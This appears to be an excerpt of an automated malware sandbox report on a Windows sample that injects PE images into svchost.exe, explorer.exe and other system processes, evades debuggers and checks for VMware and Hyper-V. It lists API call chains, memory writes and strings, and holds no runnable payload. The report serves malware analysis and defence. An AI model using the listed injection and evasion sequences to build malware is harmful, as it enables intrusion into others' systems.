Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 6772	Thread sleep count: 1292 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 5840	Thread sleep count: 1242 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe TID: 4276	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 7132	Thread sleep count: 692 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 5752	Thread sleep count: 721 > 30	Jump to behavior

Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fontview.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\resmon.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_00000001800024D0 FindFirstFileA,_time64,FindNextFileA,wsprintfA,FindNextFileA,

1_2_00000001800024D0

Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000002.00000000.2044913659.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.3299498733.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000002.00000003.3094503764.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: control.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2038249716.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000002.3299498733.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.2039818389.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-8005
Source: C:\Windows\SysWOW64\control.exe	API call chain: ExitProcess graph end node	graph_3-30896
Source: C:\Windows\SysWOW64\fontview.exe	API call chain: ExitProcess graph end node	graph_6-31235
Source: C:\Windows\SysWOW64\resmon.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\raserver.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\1731043030539.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\SysWOW64\control.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep	graph_3-30289
Source: C:\Windows\SysWOW64\fontview.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep	graph_6-30289
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\SysWOW64\resmon.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Source: C:\Windows\System32\svchost.exe

1_2_0000000180011C28

Source: C:\Windows\System32\svchost.exe

1_2_0000000180011C28

Source: C:\Windows\System32\svchost.exe

1_2_0000000180011C28

Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1001B58B mov eax, dword ptr fs:[00000030h]	3_2_1001B58B
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1001B58B mov eax, dword ptr fs:[00000030h]	6_2_1001B58B
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1001B58B mov eax, dword ptr fs:[00000030h]	8_2_1001B58B
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1001B58B mov eax, dword ptr fs:[00000030h]	9_2_1001B58B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1001B58B mov eax, dword ptr fs:[00000030h]	10_2_1001B58B

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_00000001800139A0 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,GetLastError,_lseeki64_nolock,

1_2_00000001800139A0

Source: C:\Users\user\Desktop\1731043030539.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Code function: 1_2_000000018000D10C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_000000018000D10C
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1003967E
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1003967E
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1003967E
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_1003967E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1003967E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_1003967E

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1731043030539.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AD89460000 protect: page read and write			Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Memory allocated: C:\Windows\explorer.exe base: 1220000 protect: page read and write			Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\Desktop\1731043030539.exe

Memory protected: C:\Windows\explorer.exe base: 1220000 protect: page execute read

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\1731043030539.exe

Code function: 0_2_00007FF6E5342318 OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,wsprintfW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,

0_2_00007FF6E5342318

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\1731043030539.exe	Code function: 0_2_00007FF6E5342700 lstrcpyW,OpenProcess,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,CloseHandle,CloseHandle,	0_2_00007FF6E5342700
Source: C:\Users\user\Desktop\1731043030539.exe	Code function: 0_2_00007FF6E5342318 OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,wsprintfW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,	0_2_00007FF6E5342318
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00000001800067AC VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,OutputDebugStringW,Wow64GetThreadContext,Wow64SetThreadContext,GetThreadContext,SetThreadContext,ResumeThread,WaitForSingleObject,	1_2_00000001800067AC

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\1731043030539.exe

Thread created: C:\Windows\explorer.exe EIP: 1220208

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD89460818 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\control.exe base: B107F8 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 8207F8 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\resmon.exe base: 23007F8 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07F8 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07F8 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\Desktop\1731043030539.exe

Memory written: PID: 1028 base: 1220000 value: 43

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\1731043030539.exe

Thread register set: target process: 6568

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Users\user\Desktop\1731043030539.exe

Thread register set: 6568 210FEB90E70

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD89460000	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD894607F0	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD89460818	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AD89565818	Jump to behavior
Source: C:\Users\user\Desktop\1731043030539.exe	Memory written: C:\Windows\explorer.exe base: 1220000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\control.exe base: B10000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\control.exe base: B107D0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\control.exe base: B107F8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\control.exe base: BDEDF8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 820000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 8207D0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 8207F8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 8EEDF8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\resmon.exe base: 2300000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\resmon.exe base: 23007D0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\resmon.exe base: 23007F8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\resmon.exe base: 23CEDF8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B0000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07D0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 6B07F8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\BackgroundTransferHost.exe base: 77EDF8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\raserver.exe base: 2AC0000	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07D0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\raserver.exe base: 2AC07F8	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\SysWOW64\raserver.exe base: 2B8EDF8	Jump to behavior

Source: C:\Users\user\Desktop\1731043030539.exe	Code function: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW, C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p	0_2_00007FF6E53411CB
Source: C:\Users\user\Desktop\1731043030539.exe	Code function: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW, C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p	0_2_00007FF6E53411CB
Source: C:\Users\user\Desktop\1731043030539.exe	Code function: lstrcmpiW,OpenProcess,IsWow64Process,CloseHandle,lstrcmpW, svchost.exe	0_2_00007FF6E5341BD1

Source: C:\Users\user\Desktop\1731043030539.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe	Jump to behavior

Source: explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.3297182237.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2036661129.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3294728668.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2035928494.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3292960857.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\1731043030539.exe

Code function: 0_2_00007FF6E5341ED6 cpuid

0_2_00007FF6E5341ED6

Source: C:\Windows\SysWOW64\control.exe	Code function: EnumSystemLocalesW,	3_2_1003B37D
Source: C:\Windows\SysWOW64\control.exe	Code function: GetLocaleInfoW,	3_2_1003B3BA
Source: C:\Windows\SysWOW64\control.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	3_2_1004A78D
Source: C:\Windows\SysWOW64\control.exe	Code function: GetLocaleInfoW,	3_2_1004A94F
Source: C:\Windows\SysWOW64\control.exe	Code function: EnumSystemLocalesW,	3_2_1004A9FD
Source: C:\Windows\SysWOW64\control.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_1004AA3D
Source: C:\Windows\SysWOW64\control.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_1004AABA
Source: C:\Windows\SysWOW64\control.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	3_2_1004AB3D
Source: C:\Windows\SysWOW64\control.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_10037B53
Source: C:\Windows\SysWOW64\control.exe	Code function: GetLocaleInfoW,	3_2_1004AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_10047D86
Source: C:\Windows\SysWOW64\control.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_1004AE58
Source: C:\Windows\SysWOW64\control.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_1004AF05
Source: C:\Windows\SysWOW64\control.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_1003CF4D
Source: C:\Windows\SysWOW64\control.exe	Code function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	3_2_1004AF6D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: EnumSystemLocalesW,	6_2_1003B37D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetLocaleInfoW,	6_2_1003B3BA
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	6_2_1004A78D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetLocaleInfoW,	6_2_1004A94F
Source: C:\Windows\SysWOW64\fontview.exe	Code function: EnumSystemLocalesW,	6_2_1004A9FD
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	6_2_1004AA3D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	6_2_1004AABA
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	6_2_1004AB3D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	6_2_10037B53
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetLocaleInfoW,	6_2_1004AD30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_10047D86
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1004AE58
Source: C:\Windows\SysWOW64\fontview.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	6_2_1004AF05
Source: C:\Windows\SysWOW64\fontview.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	6_2_1003CF4D
Source: C:\Windows\SysWOW64\fontview.exe	Code function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	6_2_1004AF6D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: EnumSystemLocalesW,	8_2_1003B37D
